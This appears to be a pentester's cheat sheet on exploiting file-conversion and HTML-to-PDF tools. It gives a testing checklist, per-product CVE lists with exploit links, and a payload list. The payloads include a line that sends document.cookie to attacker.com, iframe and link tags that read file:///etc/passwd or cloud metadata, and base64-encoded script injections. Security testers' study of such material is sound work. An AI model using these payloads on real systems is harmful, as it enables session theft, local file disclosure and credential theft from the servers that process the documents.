File-Converter-Exploit

A small collection of File converter vulnerability

File format

• SpreadSheet: xls, xlsx, xltx
• Document: doc, docx, odt
• Powerpoint: ppt, pptx
• Web: html
• Markdown: md
• Image: png, gif, jpeg, svg
• Archive: zip

Checklist

• Find document metadata: Product, version, sensitive data.
  • Export a PDF and find in document properties
  • Product About us
  • If Converter tool have import image/font feature: host a server and view User-agent header in incoming request.
• Check if tool can executing <script> tag
• SpreadSheet: CSV Injection
• Archive: Zip slip, symlink attack
• OLE/LFD injection
• XXE
• SSRF
• DoS
• HTML Injection/XSS
• Command Injection
• SSTI
• Log4j
• ImageMagick RCE

Tools

• PDF analysis Tool | Docs
• pdfinfo
• oxml_xxe

Paypload

<img src="x" onerror="document.write('test')" />
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<img src="http://attacker.com"/>
<link rel=attachment href="file:///etc/passwd">
<link rel=attachment href="http://168.254.168.254">
<iframe src="file:///etc/passwd"></frame>
<iframe src="http://168.254.168.254/latest/meta-data/"></frame>
<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlhzc2VkIGJ5IGFrMXQ0Iik8L3NjcmlwdD4=" HTTP-EQUIV="refresh" />
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<meta name="language" content="5;http://attacker.com/poc.svg" HTTP-EQUIV="refresh" />

Application/Framework

Office

• CVE-2017-0199:
• OLE attack
  • https://hackerone.com/reports/361793
• https://www.libreoffice.org/about-us/security/advisories/

Princexml

• Website: https://www.princexml.com/
• Vulnerability
  • <= 10: CVE-2018-19858: XXE + SSRF
  • <= 1.4.6: CVE-2016-10591: Downloads Resources over HTTP in prince--> RCE
  • PrinceXML Wrapper Class Command Injection link
  • XSS

TCPDF

• Github: https://github.com/tecnickcom/TCPDF
• Vulnerability
  • < 6.2.0: CVE-2018-17057: phar deserialization in TCPDF might lead to RCE
  • < 6.2.0: CVE-2017-6100: uploads files from the server generating PDF-files to an external FTP
  • SSRF Link

Node-HTML-PDF

• Github: https://github.com/marcbachmann/node-html-pdf
• Vulnerability
  • <= 2.2.0: CVE-2019-15138: Arbitrary file read vulnerability via file:///

pdfkit

• Github: https://github.com/foliojs/pdfkit
• Vulnerability
  • < 0.5.3: CVE-2013-1607: Command Injection

WeasyPrint

• Github: https://github.com/Kozea/WeasyPrint
• Vulnerability
  • SSRF:

    <link rel=attachment href=”file:///etc/passwd”><link rel=attachment href=”https://168.254.168.254”>
    

wkhtmltopdf

• Github: https://github.com/wkhtmltopdf/wkhtmltopdf
• Vulnerability
  • SSRF:
    • "… if wkhtmltoimage convert a http status code 302 url,it may redirect …"
    • Write-up
    • Git issue
  • XSS
  • DoS via inline XML Stylesheet in HTML to PDF conversion
• Ref: https://cure53.de/pentest-report_accessmyinfo.pdf
• Other
  • CVE-2020-10390: Chadha PHPKB Standard Multi-Language 9 Command Injection
  • CVE-2018-14865: Odoo passing documents can read local files.
  • Drupal 6: Print module RCE

Apache POI

• Github: https://github.com/apache/poi
• Vulnerability
  • <= 4.1.0: CVE-2019-12415: XXE in XSSFExportToXml
  • DoS
  • CVE list

Libreoffice

• Github: https://github.com/LibreOffice/core
• Vulnerability
  • <= 7-1: CVE-2021-25631: ShellExecute [Link]
  • <= 6.2.6: CVE-2019-9848: LibreLogo RCE [Link]
  • <= 6.0.7, <= 6.1.3: CVE-2018-16858: Remote Code Execution via Macro/Event execution
    • [Link]
    • Exploit file
  • < 6.0.1: =WEBSERVICE Remote Arbitrary File Disclosure
    • Exploit: https://www.exploit-db.com/exploits/44022
    • https://ctftime.org/writeup/15482
  • OLE, LFD/SSRF: Remote OLE Object xLinking
    • A tale of exploitation in spreadsheet file conversions
    • Write-up
  • Ghostscript: PoC
  • XXE
  • Formula Injection:
    • Cheatsheet: Hacktricks

dompdf

• Github: https://github.com/dompdf/dompdf
• Vulnerability
  • <= 1.2.1: RCE via remote font installation: [Link]
  • <= 0.6.1: CVE-2014-2383, CVE-2014-5013: Read arbitrary files, RCE via a PHP protocol
    • DOMPDF_ENABLE_PHP enable
    • Exploit: https://www.exploit-db.com/exploits/33004
  • https://github.com/dompdf/dompdf/wiki/Securing-dompdf

xdocreport

• Github: https://github.com/opensagres/xdocreport
• Vulnerability
  • SSTI: Velocity or Freemarker payload
  • XXE

Misc/Write-up

• https://www.sidechannel.blog/en/html-to-pdf-converters-can-i-hack-them/index.html
• https://mike-n1.github.io/SSRF_P4toP2
• https://medium.com/@rezaduty/security-issues-in-import-export-functionality-5d8e4b4e9ed3
• https://docs.google.com/presentation/d/1JdIjHHPsFSgLbaJcHmMkE904jmwPM4xdhEuwhy2ebvo/htmlpresent
• https://privasec.com/blog/pdf-generator-best-practices/
• https://medium.com/@armaanpathan/pdfreacter-ssrf-to-root-level-local-file-read-which-led-to-rce-eb460ffb3129
• https://viralmaniar.github.io/web%20application%20testing/webapp%20security/HTML-to-PDF-Converter-Bugs/
• https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90
• https://buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/
• https://positive.security/blog/dompdf-rce
• https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf